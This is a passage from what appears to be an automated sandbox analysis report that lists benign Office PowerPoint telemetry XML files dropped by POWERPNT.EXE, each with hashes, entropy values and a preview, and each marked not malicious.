                                                                                                                              Entropy (8bit):5.0548705366424675
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHduSr2LqBv/GbaAQierm/erHGSNah6s1S7PNWDf/0//bhmMNOcsu:2d6lirtrxHe6PSm
                                                                                                                              MD5:2060264C2BAE9D7D9FD308FA8AB99821
                                                                                                                              SHA1:367BC606D38ECB08A68B8376ABAC01A388F773F5
                                                                                                                              SHA-256:98B9906AE311890395843CFE2EDC3D8A5A0F828B21997B75689C67EE85E0BE9F
                                                                                                                              SHA-512:FE4C40EB7AAEA076732F204A4600B17098334B3E64648A4360F01D466A17A5F9D7995BA199C18795064B16E0C260D49BC7C405FC325C8AECC4D9531C383B8AE2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="142323" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Content.OnlineMoviePlaybackPause" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c5z9s" />.. <UTS T="2" Id="c5z9r" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="W" I="0" O="true" N="URLHash">.. <O T="COALESCE">.. <L>.. <S T="1" F="PauseMovie" M="Ignore" />.. </L>.. <R>.. <S T="2" F="PauseVideo" M="Ignore" />.. </R>.. </O>.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1193
                                                                                                                              Entropy (8bit):5.034952855946616
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSG/A/GbaAQ4WnerPtANRAEZiI8K1IynM9fEiIYfcJDNa4xlvXd3wu25pU2Tw:2dnRrPF6AErVD/VgJDTvArki
                                                                                                                              MD5:87D6460FFC14E30DADDBA4A68FE9B172
                                                                                                                              SHA1:5CC0C3761429D39A859925788546EC9C107BE545
                                                                                                                              SHA-256:0CD67C0E80939BC6DBD3BC427EE197C551F9FAC2D295B37F73291CD70DE12582
                                                                                                                              SHA-512:088F6B18BB16D1C3611CF3632D1B55008A24A5FFD0693FC5760E0ACE47B57071BFC9DA0DB102B7951A1BC0159B60C4BD10E2B861869A7DF19AA05EDFD188D582
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150007" V="1" DC="SM" EN="Office.PowerPoint.PPT.MorphTransition.Performance" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bar6m" />.. </S>.. <C T="U64" I="0" O="true" N="TotalTimeToPrepareMessage">.. <S T="1" F="TimeToPrepare" M="Ignore" />.. </C>.. <C T="U64" I="1" O="true" N="TotalTimeToMatchMessage">.. <S T="1" F="TimeToMatch" M="Ignore" />.. </C>.. <C T="U64" I="2" O="true" N="TimeToInitKeyFramesMessage">.. <S T="1" F="TimeToInitKeyFrames" M="Ignore" />.. </C>.. <C T="U64" I="3" O="true" N="TimeToRenderMessage">.. <S T="1" F="TimeToRender" M="Ignore" />.. </C>.. <C T="U64" I="4" O="true" N="TotalTimeMessage">.. <S T="1" F="TotalTime" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="TransitionVariantMessage">.. <S T="1" F="TransitionVariant" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3098
                                                                                                                              Entropy (8bit):4.856264284981315
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cIRkI/P+V9rxtQ6zlAclDFuhIF637Ef/I:7sVVv9Puhi637EXI
                                                                                                                              MD5:99F011FA0FD598881DC3ADCC5EBB9D3C
                                                                                                                              SHA1:5A2A0841C1D263FE85313908BFEFB67EABCF6784
                                                                                                                              SHA-256:DC6E16F40A0097962DB6DC79C7F02E4B9FAB80E865591BD62A5E1683BDC3D085
                                                                                                                              SHA-512:C12C044F7AF0B6F7B7C25C96BA36B6B08604FB5C323639D5B2C853003351829D65506587945897BDA4C9B1F7311C5E04D7FEE19D753779525AE3863B97A606C6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150010" V="9" DC="SM" EN="Office.PowerPoint.PPT.ContentLogging.Presentation" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="av2pt" />.. <UTS T="2" Id="aya55" A="ibk7w" />.. <UTS T="3" Id="a2kfx" />.. <UTS T="4" Id="bar02" />.. </S>.. <C T="FT" I="0" O="false" N="DocumentOpenTime">.. <S T="2" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="true" N="Operation">.. <S T="1" F="Operation" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="SlideCount">.. <S T="2" F="Slide Count" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="MainMasterCount">.. <S T="2" F="Main Master Count" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="ContentMasterCount">.. <S T="2" F="Content Master Count" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="EmbeddedFontsCount">.. <S T="2" F="Embedded fonts Count" M="Ignore" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):997
                                                                                                                              Entropy (8bit):5.0820368786318415
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd6MQA2A2/GbSerF/ercjszVWXTbaaCK1Xabap9G2XSaTohN1xLX4an6isFNOP:2dzQyxFrF2rcjoWDgK1qyC15D
                                                                                                                              MD5:1C12423F4C7CF0837E3E4321E79A23A6
                                                                                                                              SHA1:C6157A68C62EEABE4CBAF67133E062C62D48D3A6
                                                                                                                              SHA-256:03DDE16BD195EB729364DEB8E074385075574468ECF4415B52D2798906C53607
                                                                                                                              SHA-512:59EB0DA3DD023149628C3683A58CF93288033AE1CBB70263DA9FDD3178B66E7B10DC779029B4C843327E1039097FE7C09C5F0E696BF0C0A68CDBDE5D79A775E6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150013" V="2" DC="SM" EN="Office.PowerPoint.PPT.ContentLogging.SlidesLoaded" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="aya55" />.. <UTS T="2" Id="ayuzv" />.. </S>.. <C T="U32" I="0" O="true" N="HyperlinkCount">.. <S T="2" F="Hyperlink Count" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="SameDocumentHyperlinkCount">.. <S T="2" F="Same Document Hyperlink Count" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="CustomDataCount">.. <S T="2" F="Custom Data Count" M="Ignore" />.. </C>.. <C T="G" I="3" O="true" N="CorrelationId">.. <S T="1" F="CorrelationId" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="LinkedOleCount">.. <S T="2" F="Linked Ole Count" M="Ignore" />.. </C>.. <C T="B" I="5" O="true" N="IsAllSlidesLoaded">.. <S T="2" F="All Slides Loaded" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1461
                                                                                                                              Entropy (8bit):4.199248360362553
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dfvr8rWGt4/aKT/akT7nr7n/B+DFwVs5+v:cfvoyGt4lTHT7r7ZXv
                                                                                                                              MD5:CFB779B2A630DDC4D844578421BD884B
                                                                                                                              SHA1:6706058B886667C56A108CDD9E4E0A5FAE70101F
                                                                                                                              SHA-256:7EAE52F0BAE8C2DB9648293B378069185D541B4986596C7217A553DACD361F33
                                                                                                                              SHA-512:237E3A3B2D60348CB54BC8A512693F2845E094D790BDE98A8738448F5844D2AFF754AFDA509BB66D1B894531D237F2EB935817FC6C66B204AC42577F920D4630
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150101" V="4" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="axwza" />.. <UTS T="2" Id="aq7eq" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="AlgorithmState" />.. </L>.. <R>.. <V V="Begin" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="AlgorithmState" />.. </L>.. <R>.. <V V="End" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="Cmd_TelemetryID" />.. </S>.. <S T="4">.. <F N="Cmd_TelemetryID" />.. </S>.. </G>.. <C T="W" I="0" O="false">.. <S T="4" F="Cmd_Name" />.. </C>.. <C T="B" I="1" O="true">.. <S T="4" F="Cmd_Success" M="Ignore" />.. </C>.. <C T="U64" I="2" O="true">.. <O T="DIV">.. <L>.. <O T="SUB">.. <L>.. <S T="4" F="Timestamp" />.. </L>.. <R>.. <S T="3" F="T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4405
                                                                                                                              Entropy (8bit):3.785298009557103
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d37yTOJwObbN6UeAdTUO7mUd1G2Uq5ebMduz84iqqm1Y11Xf5h+A:c8OJBo2bRzdf5R
                                                                                                                              MD5:FDB773BB872217C3AFC2E3842DB53B69
                                                                                                                              SHA1:FD1B1E2B49B1A8016C1BF374330A8796D25CB922
                                                                                                                              SHA-256:6E5C0769AA24A4C7158228E52C2E95E5D514C450B1004D972DB5DFDE74F24D32
                                                                                                                              SHA-512:0CAA2409BA248D808E06017CEFAD9250464E2628C46A3D55A6DC5BE7208FA5828D4AFA2B58B95FED8AC85DC5C7B7DE896A42BAC92D1519ADA5B46F4AC88CFE2B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150102" V="3" DC="SM" EN="Office.PowerPoint.PPT.Immersive.OARTActionsAggregate" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="150101" />.. <TI T="2" I="15min" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. <F T="5">.. <O T="LT">.. <L>.. <S T="1" F="2" />.. </L>.. <R>.. <V V="50" T="U32" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="AND">.. <L>.. <O T="LT">.. <L>.. <S T="1" F="2" />.. </L>.. <R>.. <V V="100" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="GE">.. <L>.. <S T="1" F="2" />.. </L>.. <R>.. <V V="50" T="U32" />.. </R>.. </O>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):612
                                                                                                                              Entropy (8bit):5.013794068972846
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdVJacsB/GboWnerPVOSYVHydilfMxdy9QMj1/JMNO2su:2dHD1mrPVOS6iilkr1Q1Bk
                                                                                                                              MD5:CD7313D2BE957B961A8BEC001186D2B6
                                                                                                                              SHA1:63E2646632F691CD2979A1CD38D09664B554C51B
                                                                                                                              SHA-256:A1EBF8F34C0DBA2753BF7EB590939E6770A84E32D98281BC95C224F9910C8243
                                                                                                                              SHA-512:A487B6F8C7A7F3482CC54CA3A074D8E4EF5A9A1E4CACBEE045600CB4BE4155A7DF4AF61B64F88AA4FF54032491AEB74B5FE192992D30139C1EA3AEE548181CBF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150114" V="0" DC="SM" EN="Office.PowerPoint.PPT.SlideTransitions" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bar6l" />.. </S>.. <C T="U64" I="0" O="false" N="SlideId">.. <S T="1" F="SlideID" />.. </C>.. <C T="W" I="1" O="false" N="Type">.. <S T="1" F="Type" />.. </C>.. <C T="W" I="2" O="false" N="Variant">.. <S T="1" F="Variant" />.. </C>.. <C T="F" I="3" O="false" N="Duration">.. <S T="1" F="Duration" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1056
                                                                                                                              Entropy (8bit):4.959023296232263
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dtHmRrPGrn9x97JPk6i1lkrZJMDoJJ1nYl:c1mjGb97RAlkVvhnW
                                                                                                                              MD5:5934409C4233920EC3AB17E0427F8929
                                                                                                                              SHA1:B6A197FAE2B775CA977F9791EF136A4C9D3363AC
                                                                                                                              SHA-256:A2CF601080F5CF2664899E2C377AA749DD1DF7B382D94E9F7AA77DB2A61EF057
                                                                                                                              SHA-512:97258B0F90F8C4E430B18ACCD7C255B2334665D50F1E523C89594F1F0D52BDC1B34FDD17AFA55E36D4F375909315C7B1572D17D5C1126E89ABFA628B449626D2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150117" V="1" DC="SM" EN="Office.PowerPoint.PPT.MorphMatchingCommon" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bar6n" />.. <UTS T="2" Id="bchmd" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_CorrelationID" />.. <F N="IsMatch" />.. <F N="Type" />.. <F N="MatchCategory" />.. <F N="Contents" />.. </S>.. </G>.. <C T="G" I="0" O="false" N="CorrelationID">.. <S T="1" F="ULS_CorrelationID" />.. </C>.. <C T="B" I="1" O="false" N="IsMatch">.. <S T="1" F="IsMatch" />.. </C>.. <C T="W" I="2" O="false" N="Type">.. <S T="1" F="Type" />.. </C>.. <C T="W" I="3" O="false" N="MatchCategory">.. <S T="1" F="MatchCategory" />.. </C>.. <C T="U32" I="4" O="false" N="NumContents">.. <S T="1" F="Contents" />.. </C>.. <C T="U32" I="5" O="false" N="KeyFrameCount">.. <C>.. <S T="1" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1134
                                                                                                                              Entropy (8bit):4.85377009469081
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdV6Vyg/GbaAQ4WnerPPer9+tNqNOpX/c//4ypON+HNcfVfj05iekynUCpyntQ:2d0yrRrPGrst4UrQq9PEpl10Yj
                                                                                                                              MD5:65F9AB04401CCD061BEB454D791D8DFB
                                                                                                                              SHA1:9BC6BF904F7B92973E6C4793B1D6D20CDAC79B42
                                                                                                                              SHA-256:260EE01560F75E0EA020F15F2F2CADDE09F77D11CAA41B1F3EF17672287B1E8F
                                                                                                                              SHA-512:5A8F13AE14D9507B1F48D3A925B5DE9E77F09E9BD4CEC22E44A3C53EFBB32851B94BD44968261EA221B513A6CDEFF4664266806F0E60B46A1B3F20C4BB6B7957
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150118" V="2" DC="SM" EN="Office.PowerPoint.PPT.MorphMatchingShapes" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bar6n" />.. <UTS T="2" Id="bchmd" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="Type" M="Ignore" />.. </L>.. <R>.. <V V="ShapeKeyFrame" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ULS_CorrelationID" />.. <F N="IsMatch" />.. <F N="HasText" />.. <F N="Morphing" />.. </S>.. </G>.. <C T="G" I="0" O="false" N="CorrelationID">.. <S T="3" F="ULS_CorrelationID" />.. </C>.. <C T="B" I="1" O="false" N="IsMatch">.. <S T="3" F="IsMatch" />.. </C>.. <C T="B" I="2" O="false" N="HasText">.. <S T="3" F="HasText" />.. </C>.. <C T="B" I="3" O="false" N="IsMorphing">.. <S T="3" F="Morphing" />.. </C>.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1271
                                                                                                                              Entropy (8bit):4.853292143588998
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dSYRrPGrst4UXL4q9GQ2Ep8Xp35WnHYj:c1jGIt4qL4Mq35WHw
                                                                                                                              MD5:4D89A17ADE821BDFB4A59982EF28EB62
                                                                                                                              SHA1:4A707534175AD2F583ABE1D7A5BCDBE73C2172B9
                                                                                                                              SHA-256:1BF39873EF8CEF7FF71BA3D30CED2921523EDCEF2F0F9808AA9DE156C4D908E9
                                                                                                                              SHA-512:E915F662214B58755AB0018B5A7F1873E2C69773FFA21DDC891A1106B7BEA1F1420892B351735BB1D46416DBB5C50EC71E62A18C204F05D15585B85A21688054
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150119" V="2" DC="SM" EN="Office.PowerPoint.PPT.MorphMatchingPictures" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bar6n" />.. <UTS T="2" Id="bchmd" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="Type" M="Ignore" />.. </L>.. <R>.. <V V="CroppedPicture" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ULS_CorrelationID" />.. <F N="IsMatch" />.. <F N="ShapeCrop" />.. <F N="AnimatedCrop" />.. <F N="Reflection" />.. </S>.. </G>.. <C T="G" I="0" O="false" N="CorrelationID">.. <S T="3" F="ULS_CorrelationID" />.. </C>.. <C T="B" I="1" O="false" N="IsMatch">.. <S T="3" F="IsMatch" />.. </C>.. <C T="B" I="2" O="false" N="IsShapeCrop">.. <S T="3" F="ShapeCrop" />.. </C>.. <C T="B" I="3" O="false" N="IsAnimat
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):385
                                                                                                                              Entropy (8bit):5.27880446992319
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7AULkz9Q1eNEqMqte/GbOSIdHperh0JrCxsf0NOn2sby:TMHdV5M+v/GbSerW/0NO2su
                                                                                                                              MD5:A585C2C96225C7FBB6EE89B53E5D65BC
                                                                                                                              SHA1:2C76F0721EB1767F173F1B1AC367C996C001B477
                                                                                                                              SHA-256:174825DF3912659CA54179E386461F1352A2B3A6312145AB81F20DFF8A624888
                                                                                                                              SHA-512:6F74351901E0168418955DD65E6A1D46B9EA6C8F8FE94D0D226ACCFB661FADE68D6BFA8F5968F83326DB094520820085814C9948D7BE098597AD853BB52F0960
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150124" V="0" DC="SM" EN="Office.PowerPoint.PPT.ChangeLayoutUsage" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bh7o5" />.. </S>.. <C T="U32" I="0" O="false" N="NewLayoutId">.. <S T="1" F="NewLayout" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3346
                                                                                                                              Entropy (8bit):4.8695817954270995
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cFo9SIjYaJ0UeLg6+7Ag/FSUJCC0GzU+mopiiw5:0+jYaJ0U6gfAg/5JCC0Gz3mopZw5
                                                                                                                              MD5:FCEF1BF69399E4EF431B39AFFA7E4ED2
                                                                                                                              SHA1:6053142DDC3F0DB2A9217A9D6C93DD16D7D52248
                                                                                                                              SHA-256:459497D8D72B8C503462FBDB2D82EB4106A02C3532E1D7CC79673EC80BBA9CD3
                                                                                                                              SHA-512:2FE54F71A4EB705F5BDD3E055A8DA19D95305B753FC19C64EB7F79F90870D7A254222FA690F3AA26A3FCF595E14CCE6EAF95048481543287E6929E355DCB30B4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150131" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideContentTelemetry.Part1" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bo1zh" />.. </S>.. <C T="G" I="0" O="true" N="CorrelationId">.. <S T="1" F="CorrelationId" />.. </C>.. <C T="U32" I="1" O="true" N="FileTypeInternalFormat">.. <S T="1" F="FileTypeInternalFormat" />.. </C>.. <C T="U32" I="2" O="true" N="SlideCount">.. <S T="1" F="SlideCount" />.. </C>.. <C T="U32" I="3" O="true" N="LoadedSlides">.. <S T="1" F="LoadedSlides" />.. </C>.. <C T="U32" I="4" O="true" N="HiddenSlides">.. <S T="1" F="HiddenSlides" />.. </C>.. <C T="U32" I="5" O="true" N="SlidesWithNotes">.. <S T="1" F="SlidesWithNotes" />.. </C>.. <C T="U32" I="6" O="true" N="SlidesWithTransition">.. <S T="1" F="SlidesWithTransition" />.. </C>.. <C T="U32" I="7" O="true" N="SlidesWithTransitionAudio">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3841
                                                                                                                              Entropy (8bit):4.909943063843178
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c09RVWfPF6V7gLGQutTkEgotUdfiCAbVal5gMTu1X+6AXr:RWFAgLGQ8Xg4UdfiCAbVazgMEOt
                                                                                                                              MD5:32D3CD2454AC07CC792D53D5AE5A642E
                                                                                                                              SHA1:B71423D3EB54155C19B2CC0688401E0646D187B4
                                                                                                                              SHA-256:24B85BF22134EABC165864FDB03C2AAD3E7FF03550053FBEBD2DEC45879F10B8
                                                                                                                              SHA-512:138AC7A8A596C7BC316E86D6878B7BB4309A6B7D03792E7744734DDAE99B625379C43BA0AADA2D9273D9513F90C6EEA8579FB24A1BDF50875C614840DBCABF34
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150132" V="3" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideContentTelemetry.Part2" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bo1zh" />.. </S>.. <C T="G" I="0" O="true" N="CorrelationId">.. <S T="1" F="CorrelationId" />.. </C>.. <C T="U32" I="1" O="true" N="SlidesWithSectionZoom">.. <S T="1" F="SlidesWithSectionZoom" />.. </C>.. <C T="U32" I="2" O="true" N="SectionZoomsCount">.. <S T="1" F="SectionZoomsCount" />.. </C>.. <C T="U32" I="3" O="true" N="SlidesWithSummaryZoom">.. <S T="1" F="SlidesWithSummaryZoom" />.. </C>.. <C T="U32" I="4" O="true" N="SummaryZoomsCount">.. <S T="1" F="SummaryZoomsCount" />.. </C>.. <C T="U32" I="5" O="true" N="SlidesWithSlideZoom">.. <S T="1" F="SlidesWithSlideZoom" />.. </C>.. <C T="U32" I="6" O="true" N="SlideZoomsCount">.. <S T="1" F="SlideZoomsCount" />.. </C>.. <C T="U32" I="7" O="t
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3624
                                                                                                                              Entropy (8bit):3.2516595897799556
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dxTrXttVgfE+ThWXOgfE+ThWCwOaR2DpQhWOThWpOfKXIsPgp7sPHXOcPQR1cP4:cxTLttVfih6Ofih5QRYQhDh/G6N
                                                                                                                              MD5:867297B5D41A071ED5A64695B4944205
                                                                                                                              SHA1:69760B344399E67E21B38FBD79B5AD47A66D7200
                                                                                                                              SHA-256:30B59A32EDD53BD365E69BB5C46F347F7E1BF8AD282534BCA5970EA00A85B8B5
                                                                                                                              SHA-512:156136FA51FAA5B86D671D26D75EE5A8765920F750B88150DBA65D5D056B6B9D66B1CFE67AE3B7ADBBBF5155C43169B67400B9B7E0E6F36B77FD7F818CFE127A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150133" V="1" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="aq4c0" />.. <R T="2" R="150133" />.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Feature" />.. </L>.. <R>.. <V V="Laser" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="Event" />.. </L>.. <R>.. <V V="Finish" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Feature" />.. </L>.. <R>.. <V V="Laser" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="Event" />.. </L>.. <R
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4489
                                                                                                                              Entropy (8bit):3.527355595087324
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d1y2mrXttVgf/ThWXTDKwOeu2sa/s229CL219T2d6gdW2Rfn1rIClIUDBt5kw:c8ZLttVsh6TeZaED1xGtrNlIUDBt5kw
                                                                                                                              MD5:D821BF89825629606C4075B85FEA530B
                                                                                                                              SHA1:8A72AA4CDA5A209DF902D25A913A5B07294EC3DF
                                                                                                                              SHA-256:11E51344E1197200BEE67A1DF0947C4A7151889B2D5F391FEDA7FCECFE1AB31B
                                                                                                                              SHA-512:8EA749B3AFEB54BD73238EADA11AA7C620271A2CE51B0F9137B4338DE0D184BBA045E80E7CEF6327E4A9905E832308FA488BCD7E7FF3DD83665DA94D0301A8BD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150134" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.SlideShow.SlideRenderEvents" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="aq4c0" />.. <R T="2" R="150133" />.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Feature" />.. </L>.. <R>.. <V V="Show" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="Event" />.. </L>.. <R>.. <V V="Finish" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="0" />.. </L>.. <R>.. <V V="Slide" T="W" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <L>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
